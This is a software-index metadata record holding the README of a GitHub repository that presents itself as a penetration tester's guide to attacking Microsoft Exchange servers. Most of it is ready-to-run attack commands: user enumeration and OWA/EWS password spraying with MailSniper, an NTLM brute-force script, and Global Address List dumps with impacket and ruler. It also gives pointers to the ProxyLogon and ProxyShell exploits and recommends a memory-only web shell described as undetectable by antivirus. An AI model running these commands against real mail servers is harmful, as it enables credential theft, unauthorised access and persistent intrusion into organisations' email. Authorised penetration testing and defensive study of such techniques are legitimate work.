{"id":49471858,"url":"https://github.com/kh4sh3i/exchange-penetration-testing","last_synced_at":"2026-04-30T16:36:57.740Z","repository":{"id":41458112,"uuid":"506610379","full_name":"kh4sh3i/exchange-penetration-testing","owner":"kh4sh3i","description":"The great Microsoft exchange hack: A penetration tester’s guide (exchange penetration testing)","archived":false,"fork":false,"pushed_at":"2026-03-26T13:31:18.000Z","size":6552,"stargazers_count":135,"open_issues_count":1,"forks_count":29,"subscribers_count":2,"default_branch":"main","last_synced_at":"2026-04-30T16:36:51.600Z","etag":null,"topics":["exchange","exchange-server","exploit","mail","pentest","pentest-tool","pentesting","redteam","zeroday"],"latest_commit_sha":null,"homepage":"","language":"PowerShell","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"cc0-1.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/kh4sh3i.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null}},"created_at":"2022-06-23T11:21:45.000Z","updated_at":"2026-04-10T12:22:23.000Z","dependencies_parsed_at":"2025-08-15T13:23:33.554Z","dependency_job_id":null,"html_url":"https://github.com/kh4sh3i/exchange-penetration-testing","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/kh4sh3i/exchange-penetration-testing","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/kh4sh3i%2Fexchange-penetration-testing","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/kh4sh3i%2Fexchange-penetration-testing/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/
repositories/kh4sh3i%2Fexchange-penetration-testing/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/kh4sh3i%2Fexchange-penetration-testing/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/kh4sh3i","download_url":"https://codeload.github.com/kh4sh3i/exchange-penetration-testing/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/kh4sh3i%2Fexchange-penetration-testing/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":32470879,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-04-30T13:12:12.517Z","status":"ssl_error","status_checked_at":"2026-04-30T13:12:06.837Z","response_time":57,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["exchange","exchange-server","exploit","mail","pentest","pentest-tool","pentesting","redteam","zeroday"],"created_at":"2026-04-30T16:36:55.982Z","updated_at":"2026-04-30T16:36:57.735Z","avatar_url":"https://github.com/kh4sh3i.png","language":"PowerShell","funding_links":[],"categories":[],"sub_categories":[],"readme":"# exchange penetration testing\nThe great Microsoft exchange hack: A penetration tester’s guide (exchange penetration testing)\n\n\n## 1) Recon\n\n* local domain name\n  * https://mail.target.ir/autodiscover/autodiscover.json\n  * X-CalculatedBETarget: exchange-01.target.local\n\n* exchange version 
check\n  *  https://mail.target.ir/EWS/Exchange.asmx\n  *  X-OWA-Version: 15.2.1118.9\n\n* get exchange version\n```bash\nsudo python3 get_exchange_version.py https://mail.target.com\n```\n\n\n\n## 2) Bruteforce\n\n### use MailSniper enum\n\n```powershell\nImport-Module MailSniper.ps1\nInvoke-DomainHarvestOWA -ExchHostname mail.domain.com\n```\n\n### Password Spray\n* PasswordSprayOWA: will attempt to connect to an OWA portal and perform a password spraying attack using a userlist and a single password.\n* PasswordSprayEWS: will attempt to connect to an EWS portal and perform a password spraying attack using a userlist and a single password.\n\n```powershell\nImport-Module MailSniper.ps1\nInvoke-PasswordSprayOWA -ExchHostname mail.domain.com -UserList .\\userlist.txt -Password Spring2021 -Threads 15 -OutFile owa-sprayed-creds.txt\nInvoke-PasswordSprayEWS -ExchHostname mail.domain.com -UserList .\\userlist.txt -Password Spring2021 -Threads 15 -OutFile sprayed-ews-creds.txt\n```\n\n### python NTLM password spray\n\n```bash\npython3 bruteforce/bruteforce.py -t https://mail.domain.com/EWS/Exchange.asmx -U users.txt -p TestPassword\n```\n\n\n\n## 3) GAL\nThe Microsoft Exchange Global Address List (GAL) is a list of all end users and their respective email addresses within an Exchange Server organization that uses Microsoft Outlook for email.\n\n### use exchanger.py [impacket](https://github.com/SecureAuthCorp/impacket)\n```bash\npython GAL/exchanger.py DomainName/Username:\"Password\"@mail.domain.com nspi list-tables\n```\n\n### use ruler\n```bash\nGAL/ruler-linux64 --url https://mail.domain.com/autodiscover/autodiscover.xml --email Username@domain.com -d DomainName -u Username -p Password --debug --verbose abk dump --output gal.txt\n```\n\n### use ewsManage.py\n```bash\npython3 GAL/ewsManage.py mail.domain.com 443 plaintext DomainName Username Password findallpeopl\n```\n\n* to export the GAL we first need a valid username, password and email address
!\n\n\n\n\n\n## 4) [ProxyLogon](https://github.com/kh4sh3i/ProxyLogon)\nProxyLogon is the formally generic name for CVE-2021-26855, a vulnerability in Microsoft Exchange Server that allows an attacker to bypass authentication and impersonate the admin. We have also chained this bug with another post-auth arbitrary-file-write vulnerability, CVE-2021-27065, to get code execution.\n\n\n## 5) [ProxyShell](https://github.com/kh4sh3i/ProxyShell)\nCVE-2021-34473 Microsoft Exchange Server Remote Code Execution Vulnerability. This faulty URL normalization lets us access an arbitrary backend URL while running as the Exchange Server machine account. Although this bug is not as powerful as the SSRF in ProxyLogon, and we could manipulate only the path part of the URL\n\n\n## 6) WebShell\n* GhostWebShell (Author: Soroush Dalili (@irsdl)) is loaded only in RAM, and AV cannot detect it!\n* it is useful in ProxyLogon and ProxyShell\n```\nuse GhostWebShell.cs\n```\n\n### most famous CVEs\n```\ncve-2021-31206\ncve-2021-31207\ncve-2021-34473\ncve-2021-34523\ncve-2021-26855\ncve-2021-26857\ncve-2021-26858\ncve-2021-27065\ncve-2015-1635\n```\n\n\n\u003cimg src=\"/img/1.png\" width=\"800px\" /\u003e\n\u003cimg src=\"/img/2.png\" width=\"800px\" /\u003e\n\u003cimg src=\"/img/3.png\" width=\"800px\" /\u003e\n\u003cimg src=\"/img/4.png\" width=\"800px\" /\u003e\n\u003cimg src=\"/img/5.png\" width=\"800px\" /\u003e\n\n### Reference\n* [proxylogon orange](https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html)\n* [proxylogon orange 2](https://blog.orange.tw/2021/08/proxyoracle-a-new-attack-surface-on-ms-exchange-part-2.html)\n* [python2](https://www.how2shout.com/linux/how-to-install-python-2-7-on-ubuntu-20-04-lts/)\n* 
[proxylogon](https://proxylogon.com/)\n\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fkh4sh3i%2Fexchange-penetration-testing","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fkh4sh3i%2Fexchange-penetration-testing","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fkh4sh3i%2Fexchange-penetration-testing/lists"}